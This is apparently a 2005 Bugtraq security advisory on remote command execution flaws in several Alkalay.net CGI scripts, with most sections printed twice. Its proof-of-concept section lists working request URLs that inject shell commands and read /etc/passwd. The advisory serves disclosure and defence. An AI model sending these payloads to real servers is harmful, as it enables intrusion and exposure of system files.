Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
BID:14893
Info
Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
| Bugtraq ID: | 14893 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 21 2005 12:00AM |
| Updated: | Sep 21 2005 12:00AM |
| Credit: | Sullo <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Alkalay.net nslookup.cgi Alkalay.net notify Alkalay.net man-cgi Alkalay.net contribute.pl |
| Not Vulnerable: | |
Discussion
Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input.
An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process.
Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input.
An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process.
Exploit / POC
Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.
Solution / Fix
Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities
References:
References:
- Alkalay.net Software (Alkalay.net)
- CIRT-200504: Avi Alkalay Multiple Scripts / Multiple Issues (CIRT)